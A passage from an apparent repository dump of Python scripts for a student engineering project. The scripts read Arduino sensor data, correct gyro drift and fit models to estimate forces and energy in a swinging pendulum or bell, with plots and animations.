integration)')\n#plt.plot(timestamps_trunc2[:-1],abs(theta2),'b')\n#plt.plot(data[theta_zeros,0],theta_dot[theta_zeros],'x')\n#plt.plot(timestamps,theta_double_dot,label='theta double dot (from diff)')\n#plt.plot(timestamps,filtered_theta_double_dot,label='theta double dot (from diff and filtered)')\n#plt.plot(timestamps_trunc1[:-1],9.81*np.cos(theta1)+0.43*np.square(theta_dot_trunc1[:-1]),label='radial acc prediction')\n#plt.plot(timestamps_trunc1[:-1],a_r[first_theta_zero_idx:-1]-9.81*np.cos(theta1),label='r thetadot^2')\n#plt.plot(timestamps_trunc1[:-1],a_r[first_theta_zero_idx:-1]+9.81*np.sin(theta1),label='L theta double dot')\n#plt.plot(timestamps,5*np.square(theta_dot),label='thetadot^2')\n#plt.plot(timestamps_trunc1[:-1],np.cos(theta1),label='cos(theta)')\n#plt.plot(theta_double_dot[-len(timestamps_trunc1):-1],-np.sin(theta1))\n#plt.plot(a_theta[-len(timestamps_trunc1):-861],-np.sin(theta1[0:200]))\nplt.legend(loc='lower left')\nplt.axhline(0,color='b',linestyle='--')\n#plt.xlim(0,timestamps[-1])\n#plt.ylim(-5,5)\nplt.title('Other temporal plots that may be of interest for visualisation')\nplt.xlabel('time(s)')\nplt.show()\n"
},
{
"alpha_fraction": 0.6153846383094788,
"alphanum_fraction": 0.6380090713500977,
"avg_line_length": 33.894737243652344,
"blob_id": "a8c4ed38e5fa79d5bdab750d10d845a81b3e5d2a",
"content_id": "2b6561acf5b8e55d7ea13e19b936dc197047a9ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 663,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 19,
"path": "/Serial_reader.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import serial\nimport time\nimport csv\n\narduino = serial.Serial('/dev/cu.usbmodem14101',38400)\nstart_time = time.time()\narray = []\ni=0\nwhile True:\n serial_output = str(arduino.readline())\n if serial_output:\n elapsed_time = time.time()-start_time\n str_idx = serial_output.find('g:')\n mass = float(serial_output[str_idx+3:-8])\n array.append([elapsed_time,mass])\n print('Elapsed Time:',\"%.3f\" % round(elapsed_time,2),'s, Mass:',mass,'kg')\n with open('/Users/shuowanghe/github/IIB-Project/test.csv','a',) as newFile:\n newFileWriter = csv.writer(newFile)\n newFileWriter.writerow([elapsed_time,mass])\n"
},
{
"alpha_fraction": 0.6291501522064209,
"alphanum_fraction": 0.6446847319602966,
"avg_line_length": 51.95161437988281,
"blob_id": "4bd1eba1be0880e06e1f1106f89238b9952a5363",
"content_id": "0ab1d66ec069c8b3aea9464102e1f7494ad6286b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13132,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 248,
"path": "/optimised_corrections.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\nfrom matplotlib import animation\n###-------------------------------------------------------------------------###\n###------------------------UNPACK DATA AND GET ZEROS------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nuserinput_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay5th/userinput.csv'\nuserinput = genfromtxt(userinput_file,delimiter=',')\nfreeswing_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay5th/freeswing.csv'\nfreeswing = genfromtxt(freeswing_file,delimiter=',')\ntimestamps,a_r,a_theta,theta_dot = userinput[:,0], userinput[:,1], userinput[:,2], userinput[:,3]\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Smooth the radial acceleration signal to find theta=zeros\nfiltered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\ntheta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\nstart = theta_zeros[0]\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n timestamps = data[:,0]\n a_r = data[:,1]\n theta_dot = data[:,3]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=5)\n start = theta_zeros[0]\n #integrate theta and distribute drift before every zero\n theta_int_once = cumtrapz(theta_dot[start:],timestamps[start:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[start:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = start #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed theta\n\n#Function for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from the data #find theta=zeros\n timestamps = data[:,0]\n theta_dot = data[:,3]\n a_r = data[:,1]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=5)\n start = theta_zeros[0]\n theta_double_dot = np.gradient(theta_dot,timestamps)\n x = np.sin(theta)[start:]\n y = savgol_filter(theta_double_dot,window_length=25, polyorder=3)[start:]\n p = np.polyfit(x,y,deg=1)[0] #fit a line through all of the data points\n return p\n\n#Function for finding where force is being applied\ndef forcefinder(force):\n smooth_force = savgol_filter(force,window_length=45,polyorder=3)\n low_smooth_force = savgol_filter(force,window_length=35,polyorder=3)\n peaks,_ = find_peaks(abs(low_smooth_force),prominence=1)\n peak_matrix = np.zeros((len(peaks),3))\n peak_matrix[:,1] = peaks\n peaks = np.append(peaks,len(smooth_force))\n prev_peak = 0\n count = 0\n for i in peaks:\n mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n begin = mini_peaks_before[-1]+prev_peak\n prev_end = mini_peaks_before[0]+prev_peak\n if count != len(peaks)-1:\n peak_matrix[count,0] = begin\n if count != 0:\n peak_matrix[count-1,2] = prev_end\n prev_peak = i\n count+=1\n return peak_matrix\n\n###-------------------------------------------------------------------------###\n###-------------------------------OPTIMISATION------------------------------###\n###-------------------------------------------------------------------------###\n#Optimise correction parameters for freeswing\ndef force_func(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = get_theta(freeswing)*theta_correction_factor+theta_offset\n theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)*theta_correction_factor\n p = get_gradient(freeswing)*gradient_correction_factor\n force = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\n return sum(abs(force))\nres=least_squares(fun=force_func, x0=[1,1,0])\nprint(\"theta factor: \",res.x[0],\"\\ngradient factor: \",res.x[1],\"\\ntheta offset: \",res.x[2],\"\\ncost: \",res.fun)\ntheta_correction_factor,gradient_correction_factor,theta_offset = res.x[0],res.x[1],res.x[2]\n#get the -mlg/J gradient from fitting the userinput graph\np = get_gradient(userinput)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(userinput)\n#Calculate some force quantity T/J using just the userinput data\nforce = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\nsmooth_force = savgol_filter(force,window_length=25, polyorder=3)\n#Calculate it post corrections from freeswing data\np_corrected = p*gradient_correction_factor\ntheta_corrected = theta*theta_correction_factor+theta_offset\ntheta_dot_corrected = theta_dot*theta_correction_factor\nforce_corrected = theta_correction_factor*filtered_theta_double_dot[start:]-p_corrected*np.sin(theta_corrected[start:])\nsmooth_force_corrected = savgol_filter(force_corrected,window_length=25, polyorder=3)\n\n#get the indices where force is being applied and released\npeak_matrix = forcefinder(force_corrected).astype(int)\ntheta_dot_zeros,_ = find_peaks(abs(theta_dot[start:]),prominence=1)\n#get following data but when force isnt applied\nno_force_times = timestamps[start:]\nno_force_force = force\nno_force_theta = theta[start:]\nno_force_filtered_theta_double_dot = filtered_theta_double_dot[start:]\nfor i in range(len(peak_matrix)):\n force_range = range(peak_matrix[(len(peak_matrix)-1-i),0],peak_matrix[(len(peak_matrix)-1-i),2])\n no_force_times = np.delete(no_force_times,force_range)\n no_force_theta = np.delete(no_force_theta,force_range)\n no_force_force = np.delete(no_force_force,force_range)\n no_force_filtered_theta_double_dot = np.delete(no_force_filtered_theta_double_dot,force_range)\n#Optimise correction parameters again but only using no force data\ndef force_func2(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = no_force_theta*theta_correction_factor+theta_offset\n filtered_theta_double_dot = no_force_filtered_theta_double_dot*theta_correction_factor\n p = get_gradient(userinput)*gradient_correction_factor\n force = filtered_theta_double_dot-p*np.sin(theta)\n return sum(abs(force))\n\nres2=least_squares(fun=force_func2, x0=[1,1,0])\nprint(\"theta factor 2: \",res2.x[0],\"\\ngradient factor 2: \",res2.x[1],\"\\ntheta offset 2: \",res2.x[2],\"\\ncost 2: \",res2.fun)\ntheta_correction_factor2,gradient_correction_factor2,theta_offset2 = res2.x[0],res2.x[1],res2.x[2]\ntheta_corrected2 = theta*theta_correction_factor2+theta_offset2\np_corrected2 = p*gradient_correction_factor2\ntheta_dot_corrected2 = theta_dot*theta_correction_factor2\nforce_corrected2 = filtered_theta_double_dot[start:]*theta_correction_factor2-p_corrected2*np.sin(theta_corrected2[start:])\nsmooth_force_corrected2 = savgol_filter(force_corrected2,window_length=25, polyorder=3)\n\n# plt.plot(filtered_theta_double_dot[start:],np.sin(theta)[start:])\n# plt.plot(theta_correction_factor*filtered_theta_double_dot[start:],np.sin(theta_corrected)[start:])\n# plt.plot(theta_correction_factor2*filtered_theta_double_dot[start:],np.sin(theta_corrected2)[start:])\n\n\n###-------------------------------------------------------------------------###\n###--------------------------------ANIMATIONS-------------------------------###\n###-------------------------------------------------------------------------###\n#THETA_DOUBLE_DOT vs SIN(THETA) ANIMATION\nfig = plt.figure()\nax = plt.axes(xlim=(-1.5, 1.5), ylim=(-10,10))\nline, = ax.plot([], [], lw=1)\nline_corrected, = ax.plot([], [], lw=1)\nline_fit, = ax.plot([], [], lw=1)\ndef init():\n line.set_data([], [])\n line_corrected.set_data([], [])\n line_fit.set_data([], [])\n return line, line_corrected, line_fit,\n#Animation function. This is called sequentially\ndef animate(i):\n y = filtered_theta_double_dot[start:i+start]\n x = np.sin(theta[start:i+start])\n line.set_data(x, y)\n y_corrected = filtered_theta_double_dot[start:i+start]*theta_correction_factor2\n x_corrected = np.sin(theta[start:i+start]*theta_correction_factor2+theta_offset2)\n line_corrected.set_data(x_corrected, y_corrected)\n x_fit = np.array([-2,2])\n y_fit = p_corrected2*x_fit\n line_fit.set_data(x_fit, y_fit)\n return line, line_corrected, line_fit,\n#Call the animator. blit=True means only re-draw the parts that have changed.\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=len(theta), interval=20, blit=True)\n#Save the animation\n#anim.save('corrected.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n#Plot the animation\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$)')\nplt.show()\n\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n#Plot line fit through theta double dot vs sin(theta) relationship\nx = np.sin(theta[start:])\ny = filtered_theta_double_dot[start:]\nx_corrected=np.sin(theta_corrected2[start:])\ny_corrected=filtered_theta_double_dot[start:]*theta_correction_factor2\nplt.plot(x,y,'.',label='Raw measurements') #plot all the data points\nplt.plot(x_corrected,y_corrected,'.',label='Corrected data') #plot all the data points\nplt.plot(x,p*x,label='Line fit through origin of original points') #plot the fitted line, through the origin\nplt.plot(x_corrected,p_corrected2*x_corrected,label='Line fit through origin of corrected points')\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$) with a line fitted through')\nplt.legend()\nplt.show()\n\n#Force, theta and theta_dot vs time\n# plt.plot(timestamps[start:],smooth_force,label=\"Force measurement (Smoothed)\")\n# plt.plot(timestamps[start:],smooth_force_corrected,label=\"Corrected force measurement (Smoothed)\")\nplt.plot(timestamps[start:],smooth_force_corrected2,label='Force after 2nd correction (Smoothed)')\nplt.plot(timestamps[start:],theta_corrected[start:],label=r'$\\theta$')\nplt.plot(timestamps[start:],theta_dot_corrected[start:],label=r'$\\dot{\\theta}$')\nplt.axhline(color='b',linestyle='--',linewidth='0.5')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad$s^{-2}$)')\nplt.axis([10,60,-5,6])\nplt.title(r'$\\frac{T}{J}$ vs time')\nplt.legend()\nplt.show()\n\n#Plot Force vs (mlg/J)sin(theta)\nplt.plot(-p*np.sin(theta[start:]),smooth_force,label=\"As measured\")\nplt.plot(-p_corrected2*np.sin(theta_corrected2[start:]),smooth_force_corrected2,label=\"Corrected\")\nplt.xlabel(r'$\\frac{mgl}{J}sin(\\theta)$(rad$s^{-2}$)')\nplt.ylabel(r'$\\frac{T}{J}(ms^{-2})$')\nplt.title(r'$\\frac{T}{J}$ vs $\\frac{mgl}{J}sin(\\theta)$')\nplt.axhline(color='b',linestyle='--',linewidth='0.5')\nplt.legend()\nplt.show()\n\n#Plot Force vs velocity\nplt.plot(theta_dot[start:],smooth_force,label=\"As measured\")\nplt.plot(theta_dot_corrected2[start:],smooth_force_corrected2,label=\"Corrected\")\nplt.xlabel(r'$\\dot{\\theta}$(rad$s^{-1}$)')\nplt.ylabel(r'$\\frac{T}{J}(ms^{-2})$')\nplt.axhline(color='b',linestyle='--',linewidth='0.5')\nplt.title(r'Force vs $\\dot{\\theta}$')\nplt.legend()\nplt.show()\n"
},
{
"alpha_fraction": 0.6326588988304138,
"alphanum_fraction": 0.6518025994300842,
"avg_line_length": 54.91987228393555,
"blob_id": "4c74d46e720c0b1dd2e541cd8167c31d732694e9",
"content_id": "76edcae5e66e07b0ea8c017d4f1809b20b43a3ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17447,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 312,
"path": "/pendulum1side.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\nfrom matplotlib import animation\n###-------------------------------------------------------------------------###\n###------------------------UNPACK DATA AND GET ZEROS------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nuserinput_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/onesidepush4.csv'\nuserinput = genfromtxt(userinput_file,delimiter=',')\nfreeswing_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/freeswing.csv'\nfreeswing = genfromtxt(freeswing_file,delimiter=',')\ntimestamps,a_r,a_theta,theta_dot = userinput[:,0], userinput[:,1], userinput[:,2], userinput[:,3]\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Smooth the radial acceleration signal to find theta=zeros\nfiltered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\ntheta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\nstart = theta_zeros[0]\nfree_start_zeros,_ = find_peaks(savgol_filter(freeswing[:,1],window_length=21, polyorder=2),prominence=0.5)\nfree_start = free_start_zeros[0]\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n timestamps = data[:,0]\n a_r = data[:,1]\n theta_dot = data[:,3]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\n start = theta_zeros[0]\n #integrate theta and distribute drift before every zero\n theta_int_once = cumtrapz(theta_dot[start:],timestamps[start:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[start:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = start #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed theta\n\n#Function for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from the data #find theta=zeros\n timestamps = data[:,0]\n theta_dot = data[:,3]\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=0.5)[0][0]\n theta_double_dot = np.gradient(theta_dot,timestamps)\n x = np.sin(theta)[start:]\n y = savgol_filter(theta_double_dot,window_length=25, polyorder=3)[start:]\n p = np.polyfit(x,y,deg=1)[0] #fit a line through all of the data points\n return p\n\n#Function for finding where force is being applied\ndef forcefinder(force):\n smooth_force = savgol_filter(force,window_length=45,polyorder=3)\n low_smooth_force = savgol_filter(force,window_length=35,polyorder=3)\n peaks,_ = find_peaks(abs(low_smooth_force),prominence=1)\n peak_matrix = np.zeros((len(peaks),3))\n peak_matrix[:,1] = peaks\n peaks = np.append(peaks,len(smooth_force))\n prev_peak = 0\n count = 0\n for i in peaks:\n mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n begin = mini_peaks_before[-1]+prev_peak\n prev_end = mini_peaks_before[0]+prev_peak\n if count != len(peaks)-1:\n peak_matrix[count,0] = begin\n if count != 0:\n peak_matrix[count-1,2] = prev_end\n prev_peak = i\n count+=1\n return peak_matrix.astype(int)\n\n###-------------------------------------------------------------------------###\n###-------------------------------OPTIMISATION------------------------------###\n###-------------------------------------------------------------------------###\n#Optimise correction parameters for freeswing\ndef force_func(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = get_theta(freeswing)*theta_correction_factor+theta_offset\n theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)*theta_correction_factor\n p = get_gradient(freeswing)*gradient_correction_factor\n force = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\n return sum(abs(force))\nres=least_squares(fun=force_func, x0=[1,1,0])\nprint(\"theta factor: \",res.x[0],\"\\ngradient factor: \",res.x[1],\"\\ntheta offset: \",res.x[2],\"\\ncost: \",res.fun)\ntheta_correction_factor,gradient_correction_factor,theta_offset = res.x[0],res.x[1],res.x[2]\n#get the -mlg/J gradient from fitting the userinput graph\np = get_gradient(userinput)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(userinput)\n#Calculate some force quantity T/J using just the userinput data\nforce = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\nsmooth_force = savgol_filter(force,window_length=25, polyorder=3)\n#Calculate it post corrections from freeswing data\np_corrected = p*gradient_correction_factor\ntheta_corrected = theta*theta_correction_factor+theta_offset\ntheta_dot_corrected = theta_dot*theta_correction_factor\nforce_corrected = theta_correction_factor*filtered_theta_double_dot[start:]-p_corrected*np.sin(theta_corrected[start:])\nsmooth_force_corrected = savgol_filter(force_corrected,window_length=25, polyorder=3)\n#get the indices where force is being applied and released\npeak_matrix = forcefinder(force_corrected)\n#get following data but when force isnt applied\nno_force_times = timestamps[start:]\nno_force_force = force\nno_force_theta = theta[start:]\nno_force_filtered_theta_double_dot = filtered_theta_double_dot[start:]\nfor i in range(len(peak_matrix)):\n force_range = range(peak_matrix[(len(peak_matrix)-1-i),0],peak_matrix[(len(peak_matrix)-1-i),2])\n no_force_times = np.delete(no_force_times,force_range)\n no_force_theta = np.delete(no_force_theta,force_range)\n no_force_force = np.delete(no_force_force,force_range)\n no_force_filtered_theta_double_dot = np.delete(no_force_filtered_theta_double_dot,force_range)\n#Optimise correction parameters again but only using no force data\ndef force_func2(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = no_force_theta*theta_correction_factor+theta_offset\n filtered_theta_double_dot = no_force_filtered_theta_double_dot*theta_correction_factor\n p = get_gradient(userinput)*gradient_correction_factor\n force = filtered_theta_double_dot-p*np.sin(theta)\n return sum(abs(force))\nres2=least_squares(fun=force_func2, x0=[1,1,0])\nprint(\"theta factor 2: \",res2.x[0],\"\\ngradient factor 2: \",res2.x[1],\"\\ntheta offset 2: \",res2.x[2],\"\\ncost 2: \",res2.fun)\ntheta_correction_factor2,gradient_correction_factor2,theta_offset2 = res2.x[0],res2.x[1],res2.x[2]\ntheta_corrected2 = theta*theta_correction_factor2+theta_offset2\np_corrected2 = p*gradient_correction_factor2\ntheta_dot_corrected2 = theta_dot*theta_correction_factor2\nforce_corrected2 = filtered_theta_double_dot[start:]*theta_correction_factor2-p_corrected2*np.sin(theta_corrected2[start:])\nsmooth_force_corrected2 = savgol_filter(force_corrected2,window_length=35, polyorder=3)\n#find zero crossings of theta_dot, i.e. when bell is at extremes\ntheta_dot_zeros,_ = find_peaks(-abs(theta_dot_corrected2[start:]),prominence=1)\n#Produce clean force curve\nnoisy_peaks = find_peaks(-abs(smooth_force_corrected2),height=-0.5)[0]\nforce_curve = np.zeros(len(force_corrected2))\nstarts_and_ends = np.zeros((len(peak_matrix),2))\nforce_in = np.zeros(len(smooth_force_corrected2))\nforce_out = np.zeros(len(smooth_force_corrected2))\nenergy = np.zeros((len(peak_matrix),2))\npower = np.zeros((len(peak_matrix),2))\ncount = 0\n\nfor _ in peak_matrix[:,1]:\n force_start = max(noisy_peaks[noisy_peaks<_])\n force_end = min(noisy_peaks[noisy_peaks>_])\n # starts_and_ends[count,0],starts_and_ends[count,1] = force_start,force_end\n force_curve[force_start:force_end] = smooth_force_corrected2[force_start:force_end]\n nearest_theta_dot_zero = theta_dot_zeros[abs(_-theta_zeros).argmin()]\n if force_start<nearest_theta_dot_zero:\n force_out[force_start:nearest_theta_dot_zero] = force_curve[force_start:nearest_theta_dot_zero]\n if force_end>nearest_theta_dot_zero:\n force_in[nearest_theta_dot_zero:force_end] = force_curve[nearest_theta_dot_zero:force_end]\n energy[count,0] = max(cumtrapz(abs(force_in)[force_start:force_end],initial=0))\n energy[count,1] = max(cumtrapz(abs(force_out)[force_start:force_end],initial=0))\n power[count,0] = sum(np.multiply(abs(theta_dot_corrected2[start:])[force_start:force_end],abs(force_in)[force_start:force_end]))\n power[count,1] = sum(np.multiply(abs(theta_dot_corrected2[start:])[force_start:force_end],abs(force_out)[force_start:force_end]))\n count += 1\n\nplt.plot(timestamps[start:],np.multiply(theta_dot[start:],force_curve))\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Power input $\\frac{T}{J}\\dot{\\theta}(s^{-3})$')\nplt.show()\nstored_energy = cumtrapz(np.multiply(theta_dot[start:],force_curve),initial=0) #starts at start\nzero_energy_line = np.polyfit(timestamps[start:],stored_energy,deg=1)\nenergy_corrected = stored_energy-(timestamps[start:]*zero_energy_line[0]+zero_energy_line[1])\nenergy_highs = find_peaks(energy_corrected)[0] #starts at start\n\nplt.plot(timestamps[start:],stored_energy,label='Stored energy')\nplt.plot(timestamps[start:][energy_highs],stored_energy[energy_highs],'x',label='Energy \"Highs\"')\nplt.plot(np.array([0,60]),np.array([0,60])*zero_energy_line[0]+zero_energy_line[1],'--',linewidth=0.5,label='Line fitting energy \"zeros\"')\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.legend()\nplt.show()\n\nplt.plot(timestamps[start:],energy_corrected,label='Stored energy accounting for friction')\nplt.plot(timestamps[start:][energy_highs],energy_corrected[energy_highs],'x')\nplt.axhline(linestyle='--',linewidth=0.5)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy adjusted for friction $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\n# plt.plot(timestamps[start:],savgol_filter(theta_corrected2,window_length=21,polyorder=3)[start:])\n# plt.plot(timestamps[start:],smooth_force_corrected2)\nmax_angle_points = find_peaks(theta_corrected2[start:],prominence=0)[0]\n# plt.plot(timestamps[start:][max_angle_points],theta_corrected2[start:][max_angle_points],'x')\n# plt.plot(timestamps[start:],stored_energy)\n# plt.plot(timestamps[start:],50*smooth_force_corrected2)\n\n# plt.plot(timestamps[start:],theta_corrected2[start:])\n# plt.plot(timestamps[start:][theta_dot_zeros],theta_corrected2[start:][theta_dot_zeros],'x')\nplt.plot(energy_corrected[energy_highs][:-1],abs(theta_corrected2[start:][max_angle_points])[1:],'x')\ncorrelation = np.polyfit(energy_corrected[energy_highs][:-1],abs(theta_corrected2[start:][max_angle_points])[1:],deg=1)\nplt.plot(np.array([-25,50]),np.array([-25,50])*correlation[0]+correlation[1],'--',linewidth=0.5)\nerr = np.mean(abs(abs(theta_corrected2[start:][max_angle_points][1:])-(energy_corrected[energy_highs][:-1]*correlation[0]+correlation[1])),axis=0)\nerr\nplt.ylabel(r'Angle at max (rad)')\nplt.xlabel(r'System energy calculated $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\nplt.plot(stored_energy_times,stored_energy-stored_energy_times*zero_energy_line,label='Stored energy accounting for friction')\nenergy_calculation = 0.5*(1-p_corrected2*100/9.81)*theta_dot - p_corrected2*(1-np.cos(theta))\nplt.plot(timestamps-timestamps[start+energy_start],energy_calculation,label='Energy Calculated')\nplt.axhline(linestyle='--',linewidth=0.5)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy calculated $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n###-------------------------------------------------------------------------###\n###-------------------------------UNCERTAINTY-------------------------------###\n###-------------------------------------------------------------------------###\ndef remove_mean(data):\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=5)[0][0]\n theta_double_dot = np.gradient(data[:,3],data[:,0])[start:]\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n p = get_gradient(data)\n theta = get_theta(data)[start:]\n force = filtered_theta_double_dot-p*np.sin(theta)\n no_bins = 20\n means_variance = np.zeros([no_bins,2])\n free_theta = get_theta(freeswing)[free_start:]\n free_p = get_gradient(freeswing)\n free_theta_double_dot = np.gradient(freeswing[:,3][free_start:],freeswing[:,0][free_start:])\n free_filtered_theta_double_dot = savgol_filter(free_theta_double_dot,window_length=25, polyorder=3)\n free_force = free_filtered_theta_double_dot-free_p*np.sin(free_theta)\n fixed_force = filtered_theta_double_dot-p*np.sin(theta)\n for bin in range(no_bins):\n bin_start = (bin-no_bins/2)*2*np.pi/no_bins\n bin_end = (bin-no_bins/2+1)*2*np.pi/no_bins\n free_bin_indices = np.where((free_theta>=bin_start)&(free_theta<bin_end))\n data_bin_indices = np.where((theta>=bin_start)&(theta<bin_end))\n if np.size(free_bin_indices)>0:\n means_variance[bin,0] = np.mean(free_force[free_bin_indices])\n means_variance[bin,1] = np.var(free_force[free_bin_indices])\n fixed_force[data_bin_indices] = force[data_bin_indices] - means_variance[bin,0]\n return fixed_force, means_variance\n\"\"\"\n###-------------------------------------------------------------------------###\n###--------------------------------ANIMATIONS-------------------------------###\n###-------------------------------------------------------------------------###\n#THETA_DOUBLE_DOT vs SIN(THETA) ANIMATION\n\nfig = plt.figure()\nax = plt.axes(xlim=(-1.5, 1.5), ylim=(-10,10))\nline, = ax.plot([], [], lw=1)\ndef init():\n line.set_data([], [])\n return line,\n#Animation function. This is called sequentially\ndef animate(i):\n y = filtered_theta_double_dot[start:start+i]\n x = 